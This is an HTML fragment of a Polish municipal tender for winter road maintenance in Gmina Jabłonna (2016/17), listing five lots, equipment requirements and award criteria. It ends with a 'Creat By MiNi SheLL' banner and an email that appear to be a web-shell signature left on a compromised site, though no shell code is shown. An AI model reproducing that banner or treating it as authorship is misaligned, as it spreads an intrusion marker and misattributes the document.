                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Oferowana cena </td><td>60</td></tr><tr><td>Termin rozpoczęcia prac od momentu zlecenia </td><td>20</td></tr><tr><td>Wysokość kary umownej w zakresie zwłoki w wykonywaniu zlecenia powyżej dopuszczalnego czasu zwłoki wskazanego w kryterium Termin rozpoczęcia prac od momentu zlecenia</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Wzór umowy stanowi załącznik nr 5 do niniejszej specyfikacji istotnych warunków zamówienia. Przewidywane zmiany umowy zawarto we wzorze umowy stanowiącym integralną część SIWZ.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/11/2016, godzina: 9:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Odśnieżanie dróg gminnych i placów w  miejscowości: Skrzynice Pierwsze, Skrzynice Drugie, Wolnica, Majdan Chmielowski, Chmiel Pierwszy. Posypywanie własną mieszanką piaskowo solną miejsc szczególnie niebezpiecznych (skrzyżowania, zakręty, wzniesienia) w ciągu dróg gminnych oraz  placów na terenie Gminy Jabłonna.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamówienie składa się z pięciu części, a jego przedmiotem zamówienia jest świadczenie usług polegających na zimowym utrzymaniu dróg w sezonie zima: 2016/17, a w szczególności: odśnieżanie dróg gminnych w okresach opadów śniegu i zamieci śnieżnych, jak również usuwanie błota pośniegowego, posypywanie mieszanką piaskowo solną dróg i placów na terenie sołectw gminy zapewniając ciągłość ruchu drogowego. Wykonawca może składać oferty na wszystkie części zamówienia. 
Usługi polegać będą na: 
- odśnieżaniu dróg o nawierzchni bitumicznej ,tłuczniowej , tłuczniowo  gruntowej,
- posypywaniu mieszanką piaskowo  solną miejsc szczególnie niebezpiecznych (skrzyżowania, zakręty, wzniesienia) w ciągu dróg gminnych oraz placów na terenie Gminy Jabłonna.
- utrzymaniu w gotowości sprzętu i maszyn przewidzianych do realizacji umowy wraz z ich obsługą; 
- zapewnienie przez Wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do świadczenia usług,
Oprócz czynności podstawowych, do obowiązków Wykonawcy należy także niezwłoczne przekazywanie (za pośrednictwem osób obsługujących pojazdy i sprzęt) osobom upoważnionym ze strony Zamawiającego informacji o: 
- aktualnym stanie przejezdności dróg, 
- czasie rozpoczęcia i zakończenia wykonania usług na poszczególnych odcinkach dróg. 
- zagrożeniach spowodowanych warunkami atmosferycznymi, 
- innych zdarzeniach zauważonych na drodze. 
W związku z powyższym każda maszyna przy odśnieżaniu będzie wyposażona w urządzenia GPS, który Wykonawca na czas trwania umowy otrzyma od Zamawiającego.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Oferowana cena </td><td>60</td></tr><tr><td>Termin rozpoczęcia prac od momentu zlecenia </td><td>20</td></tr><tr><td>Wysokość kary umownej w zakresie zwłoki w wykonywaniu zlecenia powyżej dopuszczalnego czasu zwłoki</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Wykonawca zobowiązany jest wykazać się odpowiednim potencjałem technicznym gwarantującym  należyte wykonanie zamówienia w trudnych warunkach zimowych. Uznaje się, że warunek potencjału technicznego zostanie spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował n/w sprzętem: 
Część 1 zamówienia: 
Minimum 1 pługiem dziobowym ciężkim oraz nośnikiem pługa  lub minimum 1 pługiem prostym oraz nośnikiem pługa. 
Minimum 1 piaskarką oraz nośnikiem piaskarki.
<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Odśnieżanie dróg gminnych w  miejscowości: Czerniejów, Czerniejów - Kolonia, Skrzynice - Kolonia,  Jabłonna  Majątek, Tuszów.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamówienie składa się z pięciu części, a jego przedmiotem zamówienia jest świadczenie usług polegających na zimowym utrzymaniu dróg w sezonie zima: 2016/17, a w szczególności: odśnieżanie dróg gminnych w okresach opadów śniegu i zamieci śnieżnych, jak również usuwanie błota pośniegowego, posypywanie mieszanką piaskowo solną dróg i placów na terenie sołectw gminy zapewniając ciągłość ruchu drogowego. Wykonawca może składać oferty na wszystkie części zamówienia. 
Usługi polegać będą na: 
- odśnieżaniu dróg o nawierzchni bitumicznej ,tłuczniowej , tłuczniowo  gruntowej,
- posypywaniu mieszanką piaskowo  solną miejsc szczególnie niebezpiecznych (skrzyżowania, zakręty, wzniesienia) w ciągu dróg gminnych oraz placów na terenie Gminy Jabłonna.
- utrzymaniu w gotowości sprzętu i maszyn przewidzianych do realizacji umowy wraz z ich obsługą; 
- zapewnienie przez Wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do świadczenia usług,
Oprócz czynności podstawowych, do obowiązków Wykonawcy należy także niezwłoczne przekazywanie (za pośrednictwem osób obsługujących pojazdy i sprzęt) osobom upoważnionym ze strony Zamawiającego informacji o: 
- aktualnym stanie przejezdności dróg, 
- czasie rozpoczęcia i zakończenia wykonania usług na poszczególnych odcinkach dróg. 
- zagrożeniach spowodowanych warunkami atmosferycznymi, 
- innych zdarzeniach zauważonych na drodze. 
W związku z powyższym każda maszyna przy odśnieżaniu będzie wyposażona w urządzenia GPS, który Wykonawca na czas trwania umowy otrzyma od Zamawiającego.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Oferowana cena </td><td>60</td></tr><tr><td>Termin rozpoczęcia prac od momentu zlecenia </td><td>20</td></tr><tr><td>Wysokość kary umownej w zakresie zwłoki w wykonywaniu zlecenia powyżej dopuszczalnego czasu zwłoki</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Wykonawca zobowiązany jest wykazać się odpowiednim potencjałem technicznym gwarantującym  należyte wykonanie zamówienia w trudnych warunkach zimowych. Uznaje się, że warunek potencjału technicznego zostanie spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował n/w sprzętem: 
Część 2 zamówienia: 
Minimum 1 pługiem dziobowym ciężkim oraz nośnikiem pługa.
<br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Odśnieżanie dróg gminnych i placów w  miejscowości: Jabłonna Druga, Wierciszów (prawa strona drogi wojewódzkiej nr 835).<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamówienie składa się z pięciu części, a jego przedmiotem zamówienia jest świadczenie usług polegających na zimowym utrzymaniu dróg w sezonie zima: 2016/17, a w szczególności: odśnieżanie dróg gminnych w okresach opadów śniegu i zamieci śnieżnych, jak również usuwanie błota pośniegowego, posypywanie mieszanką piaskowo solną dróg i placów na terenie sołectw gminy zapewniając ciągłość ruchu drogowego. Wykonawca może składać oferty na wszystkie części zamówienia. 
Usługi polegać będą na: 
- odśnieżaniu dróg o nawierzchni bitumicznej ,tłuczniowej , tłuczniowo  gruntowej,
- posypywaniu mieszanką piaskowo  solną miejsc szczególnie niebezpiecznych (skrzyżowania, zakręty, wzniesienia) w ciągu dróg gminnych oraz placów na terenie Gminy Jabłonna.
- utrzymaniu w gotowości sprzętu i maszyn przewidzianych do realizacji umowy wraz z ich obsługą; 
- zapewnienie przez Wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do świadczenia usług,
Oprócz czynności podstawowych, do obowiązków Wykonawcy należy także niezwłoczne przekazywanie (za pośrednictwem osób obsługujących pojazdy i sprzęt) osobom upoważnionym ze strony Zamawiającego informacji o: 
- aktualnym stanie przejezdności dróg, 
- czasie rozpoczęcia i zakończenia wykonania usług na poszczególnych odcinkach dróg. 
- zagrożeniach spowodowanych warunkami atmosferycznymi, 
- innych zdarzeniach zauważonych na drodze. 
W związku z powyższym każda maszyna przy odśnieżaniu będzie wyposażona w urządzenia GPS, który Wykonawca na czas trwania umowy otrzyma od Zamawiającego.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Oferowana cena </td><td>60</td></tr><tr><td>Termin rozpoczęcia prac od momentu zlecenia </td><td>20</td></tr><tr><td>Wysokość kary umownej w zakresie zwłoki w wykonywaniu zlecenia powyżej dopuszczalnego czasu zwłoki</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Wykonawca zobowiązany jest wykazać się odpowiednim potencjałem technicznym gwarantującym  należyte wykonanie zamówienia w trudnych warunkach zimowych. Uznaje się, że warunek potencjału technicznego zostanie spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował n/w sprzętem:
Część 3 zamówienia: 
minimum 1 pługiem dziobowym ciężkim oraz nośnikiem pługa.  
<br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Odśnieżanie dróg gminnych i placów  w  miejscowości: Jabłonna Pierwsza, Jabłonna Druga (lewa strona drogi wojewódzkiej nr 835).<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamówienie składa się z pięciu części, a jego przedmiotem zamówienia jest świadczenie usług polegających na zimowym utrzymaniu dróg w sezonie zima: 2016/17, a w szczególności: odśnieżanie dróg gminnych w okresach opadów śniegu i zamieci śnieżnych, jak również usuwanie błota pośniegowego, posypywanie mieszanką piaskowo solną dróg i placów na terenie sołectw gminy zapewniając ciągłość ruchu drogowego. Wykonawca może składać oferty na wszystkie części zamówienia. 
Usługi polegać będą na: 
- odśnieżaniu dróg o nawierzchni bitumicznej ,tłuczniowej , tłuczniowo  gruntowej,
- posypywaniu mieszanką piaskowo  solną miejsc szczególnie niebezpiecznych (skrzyżowania, zakręty, wzniesienia) w ciągu dróg gminnych oraz placów na terenie Gminy Jabłonna.
- utrzymaniu w gotowości sprzętu i maszyn przewidzianych do realizacji umowy wraz z ich obsługą; 
- zapewnienie przez Wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do świadczenia usług,
Oprócz czynności podstawowych, do obowiązków Wykonawcy należy także niezwłoczne przekazywanie (za pośrednictwem osób obsługujących pojazdy i sprzęt) osobom upoważnionym ze strony Zamawiającego informacji o: 
- aktualnym stanie przejezdności dróg, 
- czasie rozpoczęcia i zakończenia wykonania usług na poszczególnych odcinkach dróg. 
- zagrożeniach spowodowanych warunkami atmosferycznymi, 
- innych zdarzeniach zauważonych na drodze. 
W związku z powyższym każda maszyna przy odśnieżaniu będzie wyposażona w urządzenia GPS, który Wykonawca na czas trwania umowy otrzyma od Zamawiającego.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Oferowana cena </td><td>60</td></tr><tr><td>Termin rozpoczęcia prac od momentu zlecenia </td><td>20</td></tr><tr><td>Wysokość kary umownej w zakresie zwłoki w wykonywaniu zlecenia powyżej dopuszczalnego czasu zwłoki</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Wykonawca zobowiązany jest wykazać się odpowiednim potencjałem technicznym gwarantującym  należyte wykonanie zamówienia w trudnych warunkach zimowych. Uznaje się, że warunek potencjału technicznego zostanie spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował n/w sprzętem:
Część 4 zamówienia: 
Minimum 1 pługiem dziobowym ciężkim oraz nośnikiem pługa  lub minimum 1 pługiem prostym oraz nośnikiem pługa. 
<br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Odśnieżanie dróg gminnych i placów w  miejscowości: Piotrków Pierwszy, Piotrków Drugi, Piotrków  Kolonia.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamówienie składa się z pięciu części, a jego przedmiotem zamówienia jest świadczenie usług polegających na zimowym utrzymaniu dróg w sezonie zima: 2016/17, a w szczególności: odśnieżanie dróg gminnych w okresach opadów śniegu i zamieci śnieżnych, jak również usuwanie błota pośniegowego, posypywanie mieszanką piaskowo solną dróg i placów na terenie sołectw gminy zapewniając ciągłość ruchu drogowego. Wykonawca może składać oferty na wszystkie części zamówienia. 
Usługi polegać będą na: 
- odśnieżaniu dróg o nawierzchni bitumicznej ,tłuczniowej , tłuczniowo  gruntowej,
- posypywaniu mieszanką piaskowo  solną miejsc szczególnie niebezpiecznych (skrzyżowania, zakręty, wzniesienia) w ciągu dróg gminnych oraz placów na terenie Gminy Jabłonna.
- utrzymaniu w gotowości sprzętu i maszyn przewidzianych do realizacji umowy wraz z ich obsługą; 
- zapewnienie przez Wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do świadczenia usług,
Oprócz czynności podstawowych, do obowiązków Wykonawcy należy także niezwłoczne przekazywanie (za pośrednictwem osób obsługujących pojazdy i sprzęt) osobom upoważnionym ze strony Zamawiającego informacji o: 
- aktualnym stanie przejezdności dróg, 
- czasie rozpoczęcia i zakończenia wykonania usług na poszczególnych odcinkach dróg. 
- zagrożeniach spowodowanych warunkami atmosferycznymi, 
- innych zdarzeniach zauważonych na drodze. 
W związku z powyższym każda maszyna przy odśnieżaniu będzie wyposażona w urządzenia GPS, który Wykonawca na czas trwania umowy otrzyma od Zamawiającego.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Oferowana cena </td><td>60</td></tr><tr><td>Termin rozpoczęcia prac od momentu zlecenia </td><td>20</td></tr><tr><td>Wysokość kary umownej w zakresie zwłoki w wykonywaniu zlecenia powyżej dopuszczalnego czasu zwłoki</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Wykonawca zobowiązany jest wykazać się odpowiednim potencjałem technicznym gwarantującym  należyte wykonanie zamówienia w trudnych warunkach zimowych. Uznaje się, że warunek potencjału technicznego zostanie spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował n/w sprzętem:
Część 5 zamówienia: 
Minimum 1 pługiem dziobowym ciężkim oraz nośnikiem pługa  
<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com